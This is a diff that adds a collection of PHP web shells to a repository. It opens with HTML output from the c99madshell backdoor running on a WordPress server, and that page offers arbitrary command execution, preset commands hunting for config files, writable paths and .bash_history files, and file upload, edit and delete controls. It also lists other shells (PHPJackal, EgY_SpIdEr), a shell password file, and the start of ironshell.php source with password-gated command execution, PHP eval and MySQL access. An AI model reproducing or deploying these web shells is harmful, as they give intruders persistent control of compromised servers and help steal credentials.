<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-load.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-load.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-load.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox21" value="/var/www/html/wordpress/wp-load.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-login.php';document.todo.submit();">wp-login.php</a></td>
|
||||||
|
<td>20.73 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-login.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-login.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-login.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-login.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-login.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox22" value="/var/www/html/wordpress/wp-login.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-mail.php';document.todo.submit();">wp-mail.php</a></td>
|
||||||
|
<td>6.95 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-mail.php';document.todo.submit();">04.11.2009 16:49:39</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-mail.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-mail.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-mail.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-mail.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox23" value="/var/www/html/wordpress/wp-mail.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-pass.php';document.todo.submit();">wp-pass.php</a></td>
|
||||||
|
<td>487 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-pass.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-pass.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-pass.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-pass.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-pass.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox24" value="/var/www/html/wordpress/wp-pass.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rdf.php';document.todo.submit();">wp-rdf.php</a></td>
|
||||||
|
<td>218 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rdf.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rdf.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rdf.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rdf.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rdf.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox25" value="/var/www/html/wordpress/wp-rdf.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-register.php';document.todo.submit();">wp-register.php</a></td>
|
||||||
|
<td>316 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-register.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-register.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-register.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-register.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-register.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox26" value="/var/www/html/wordpress/wp-register.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rss.php';document.todo.submit();">wp-rss.php</a></td>
|
||||||
|
<td>218 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rss.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox27" value="/var/www/html/wordpress/wp-rss.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rss2.php';document.todo.submit();">wp-rss2.php</a></td>
|
||||||
|
<td>220 B</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss2.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss2.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss2.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox28" value="/var/www/html/wordpress/wp-rss2.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-settings.php';document.todo.submit();">wp-settings.php</a></td>
|
||||||
|
<td>21.02 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-settings.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-settings.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-settings.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-settings.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-settings.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox29" value="/var/www/html/wordpress/wp-settings.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-trackback.php';document.todo.submit();">wp-trackback.php</a></td>
|
||||||
|
<td>3.39 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-trackback.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-trackback.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-trackback.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-trackback.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-trackback.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox30" value="/var/www/html/wordpress/wp-trackback.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();">wp-xmlrpc.php</a></td>
|
||||||
|
<td>21.17 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();">14.01.2010 10:59:48</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox31" value="/var/www/html/wordpress/wp-xmlrpc.php"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='xmlrpc.php';document.todo.submit();">xmlrpc.php</a></td>
|
||||||
|
<td>91.21 KB</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='xmlrpc.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='xmlrpc.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='xmlrpc.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a> <a href="#" onclick="document.todo.act.value='f';document.todo.f.value='xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a> <a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a> <input type="checkbox" name="actbox[]" id="actbox32" value="/var/www/html/wordpress/xmlrpc.php"></td>
|
||||||
|
</tr>
|
||||||
|
</table><hr size="1" noshade><p align="right">
|
||||||
|
<script>
|
||||||
|
function ls_setcheckboxall(status)
|
||||||
|
{
|
||||||
|
var id = 0;
|
||||||
|
var num = 33;
|
||||||
|
while (id <= num)
|
||||||
|
{
|
||||||
|
document.getElementById('actbox'+id).checked = status;
|
||||||
|
id++;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
function ls_reverse_all()
|
||||||
|
{
|
||||||
|
var id = 0;
|
||||||
|
var num = 33;
|
||||||
|
while (id <= num)
|
||||||
|
{
|
||||||
|
document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
|
||||||
|
id++;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
<input type="button" onclick="ls_setcheckboxall(1);" value="Select all"> <input type="button" onclick="ls_setcheckboxall(0);" value="Unselect all"><b><select name=act><option value="ls">With selected:</option><option value=delete>Delete</option><option value=chmod>Change-mode</option></select> <input type=submit value="Confirm"></p></form></td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
|
||||||
|
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: Command execute ::</b></p></td></tr>
|
||||||
|
<tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="cmd" size="50" value=""><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>:: Select ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/var/www/html/wordpress/"><select name="cmd"><option value="ls -la">-----------------------------------------------------------</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name "config*"">find config* files</option><option value="find . -type f -name "config*"">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="netstat -an | grep -i listen">show opened ports</option></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE>
|
||||||
|
<br>
|
||||||
|
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
|
||||||
|
<tr>
|
||||||
|
<td width="50%" height="1" valign="top"><center><b>:: Search ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td>
|
||||||
|
<td width="50%" height="1" valign="top"><center><b>:: Upload ::</b><form method="POST" name="tod" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="file" name="uploadfile"><input type=submit name=submit value="Upload"><br><font color=green>[ ok ]</font></form></center></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="mkdir" size="50" value="/var/www/html/wordpress/"> <input type=submit value="Create"><br><font color=green>[ ok ]</font></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="mkfile" size="50" value="/var/www/html/wordpress/"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><font color=green>[ ok ]</font></form></center></td></tr></table>
|
||||||
|
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="/var/www/html/wordpress/"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="f" size="50" value="/var/www/html/wordpress/"> <input type=submit value="Go"></form></center></td></tr></table>
|
||||||
|
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. 3.0 BLOG edition<a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a> ]--</b></p></td></tr></table>
|
||||||
|
</body></html>
|
||||||
6146
php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php
Normal file
6146
php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php
Normal file
File diff suppressed because one or more lines are too long
BIN
php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php.jpg
Normal file
BIN
php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 22 KiB |
BIN
php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php2.jpg
Normal file
BIN
php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 105 KiB |
BIN
php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.jpg
Normal file
BIN
php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 115 KiB |
1413
php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.php
Normal file
1413
php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/【PHPJackal】/PHPJackal.jpg
Normal file
BIN
php/PHPshell/【PHPJackal】/PHPJackal.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 103 KiB |
1582
php/PHPshell/【PHPJackal】/PHPJackal.php
Normal file
1582
php/PHPshell/【PHPJackal】/PHPJackal.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/【PHPJackal】/PHPJackal2.jpg
Normal file
BIN
php/PHPshell/【PHPJackal】/PHPJackal2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 82 KiB |
BIN
php/PHPshell/【PHPJackal】/Thumbs.db
Normal file
BIN
php/PHPshell/【PHPJackal】/Thumbs.db
Normal file
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 77 KiB |
3149
php/PHPshell/【Shell [ci] .Biz was here】/Shell [ci] .Biz was here.php
Normal file
3149
php/PHPshell/【Shell [ci] .Biz was here】/Shell [ci] .Biz was here.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/【c99_madnet】/c99_madnet.jpg
Normal file
BIN
php/PHPshell/【c99_madnet】/c99_madnet.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 74 KiB |
BIN
php/PHPshell/【c99_madnet】/c99_madnet2.jpg
Normal file
BIN
php/PHPshell/【c99_madnet】/c99_madnet2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 75 KiB |
7
php/PHPshell/【c99_madnet】/smowu.php
Normal file
7
php/PHPshell/【c99_madnet】/smowu.php
Normal file
File diff suppressed because one or more lines are too long
2
php/PHPshell/【c99_madnet】/密码.txt
Normal file
2
php/PHPshell/【c99_madnet】/密码.txt
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
<EFBFBD>˺<EFBFBD>:smowu
|
||||||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>:smowu
|
||||||
BIN
php/PHPshell/【c99_madnet】/连接密码.jpg
Normal file
BIN
php/PHPshell/【c99_madnet】/连接密码.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 24 KiB |
BIN
php/PHPshell/【ironshell】/ironshell.jpg
Normal file
BIN
php/PHPshell/【ironshell】/ironshell.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 116 KiB |
588
php/PHPshell/【ironshell】/ironshell.php
Normal file
588
php/PHPshell/【ironshell】/ironshell.php
Normal file
@@ -0,0 +1,588 @@
|
|||||||
|
<?php
|
||||||
|
error_reporting(0); //If there is an error, we'll show it, k?
|
||||||
|
|
||||||
|
$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
|
||||||
|
|
||||||
|
$me = basename(__FILE__);
|
||||||
|
$cookiename = "wieeeee";
|
||||||
|
|
||||||
|
|
||||||
|
if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
|
||||||
|
{
|
||||||
|
|
||||||
|
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
|
||||||
|
{
|
||||||
|
$_POST['pass'] = md5($_POST['pass']);
|
||||||
|
}
|
||||||
|
|
||||||
|
if($_POST['pass'] == $password)
|
||||||
|
{
|
||||||
|
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
|
||||||
|
}
|
||||||
|
reload();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
|
||||||
|
{
|
||||||
|
login();
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
//
|
||||||
|
//Do not cross this line! All code placed after this block can't be executed without being logged in!
|
||||||
|
//
|
||||||
|
|
||||||
|
if(isset($_GET['p']) && $_GET['p'] == "logout")
|
||||||
|
{
|
||||||
|
setcookie ($cookiename, "", time() - 3600);
|
||||||
|
reload();
|
||||||
|
}
|
||||||
|
if(isset($_GET['dir']))
|
||||||
|
{
|
||||||
|
chdir($_GET['dir']);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
$pages = array(
|
||||||
|
'cmd' => 'Execute Command',
|
||||||
|
'eval' => 'Evaluate PHP',
|
||||||
|
'mysql' => 'MySQL Query',
|
||||||
|
'chmod' => 'Chmod File',
|
||||||
|
'phpinfo' => 'PHPinfo',
|
||||||
|
'md5' => 'md5 cracker',
|
||||||
|
'headers' => 'Show headers',
|
||||||
|
'logout' => 'Log out'
|
||||||
|
);
|
||||||
|
|
||||||
|
//The header, like it?
|
||||||
|
$header = '<html>
|
||||||
|
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
|
||||||
|
<head>
|
||||||
|
<style>
|
||||||
|
td {
|
||||||
|
font-size: 12px;
|
||||||
|
font-family: verdana;
|
||||||
|
color: #33FF00;
|
||||||
|
background: #000000;
|
||||||
|
}
|
||||||
|
|
||||||
|
#d {
|
||||||
|
background: #003000;
|
||||||
|
}
|
||||||
|
#f {
|
||||||
|
background: #003300;
|
||||||
|
}
|
||||||
|
#s {
|
||||||
|
background: #006300;
|
||||||
|
}
|
||||||
|
#d:hover
|
||||||
|
{
|
||||||
|
background: #003300;
|
||||||
|
}
|
